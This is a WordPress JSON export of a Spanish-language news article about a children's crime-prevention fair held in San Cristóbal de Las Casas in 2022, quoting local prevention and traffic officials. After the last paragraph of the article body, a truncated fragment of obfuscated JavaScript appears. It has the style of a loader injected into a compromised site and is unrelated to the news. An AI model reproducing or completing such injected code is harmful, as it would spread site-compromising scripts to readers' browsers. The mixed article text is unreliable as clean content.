{"id":1821,"date":"2022-05-02T03:45:27","date_gmt":"2022-05-02T03:45:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1821"},"modified":"2022-05-02T03:45:29","modified_gmt":"2022-05-02T03:45:29","slug":"realizan-feria-fuerza-infantil-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1821","title":{"rendered":"Realizan Feria \u201cFuerza Infantil San Crist\u00f3bal\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-1822\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2-1536x1153.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/WhatsApp-Image-2022-04-29-at-6.02.42-PM-2.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- En el marco de la celebraci\u00f3n del D\u00eda de  la Ni\u00f1a y el Ni\u00f1o y con la finalidad de fomentar una sana convivencia, el uso correcto de los n\u00fameros de emergencia, la prevenci\u00f3n de delitos, siniestros viales y  fomentar el v\u00ednculo y confianza con nuestras corporaciones de seguridad, la Coordinaci\u00f3n de Prevenci\u00f3n del Delito en coordinaci\u00f3n con la Direcci\u00f3n de Tr\u00e1nsito Municipal, llevaron a cabo la feria de la prevenci\u00f3n \u201cFuerza Infantil San Crist\u00f3bal 2022\u201d. Durante la puesta en marcha de talleres, actividades l\u00fadicas, juegos y exhibici\u00f3n de veh\u00edculos oficiales a ni\u00f1os y ni\u00f1as, la responsable de la dependencia de prevenci\u00f3n, Gloribeth Dom\u00ednguez Gonz\u00e1lez, inform\u00f3 que uno de los indicadores m\u00e1s importantes para evaluar el funcionamiento de las sociedades es el nivel de integraci\u00f3n o desarticulaci\u00f3n en que se ven involucrados los menores de edad. \u201cEn todo caso, mantener un bajo \u00edndice de participaci\u00f3n de los ni\u00f1os y adolescentes en actividades delictivas (sobre todo de alto impacto), nos remite a sociedades que garantizan derechos sociales y humanos con inclusi\u00f3n y que al mismo tiempo reflejan la construcci\u00f3n de un presente-futuro con altas expectativas de bienestar\u201d, refiri\u00f3. \u201cLa experiencia ha demostrado que cualquier acci\u00f3n que se emprenda para prevenir la delincuencia y combatir el delito, no tendr\u00eda \u00e9xito si no se cuenta con la participaci\u00f3n de la ciudadan\u00eda, es por ello que con un nuevo esquema, la formulaci\u00f3n de programas y la realizaci\u00f3n de acciones del quehacer p\u00fablico, deben establecerse con la participaci\u00f3n de la sociedad\u201d, coment\u00f3. Por su parte, Miguel \u00c1ngel Aguilar Vel\u00e1zquez, Director de Tr\u00e1nsito Municipal, agradeci\u00f3 la participaci\u00f3n de los cuerpos de seguridad y emergencias que coadyuvaron para la realizaci\u00f3n de esta feria: C5, Escudo Urbano; Polic\u00eda Estatal y Municipal; Tr\u00e1nsito Municipal y del Estado; Protecci\u00f3n Civil; Bomberos; Cruz Roja Mexicana; Guardia Nacional, SEDENA, Polic\u00eda de Caminos; las Direcciones de: Ecolog\u00eda y Medio Ambiente; Equidad de G\u00e9nero y Desarrollo de las Mujeres; y SIPINNA.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- En el marco de la celebraci\u00f3n del D\u00eda de la Ni\u00f1a y el Ni\u00f1o y con la finalidad de fomentar una sana convivencia, el uso correcto de los n\u00fameros de emergencia, la prevenci\u00f3n de delitos, siniestros viales y fomentar el v\u00ednculo y confianza con nuestras corporaciones de seguridad, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1822,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1821","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1821"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1821\/revisions"}],"predecessor-version":[{"id":1823,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1821\/revisions\/1823"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1822"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}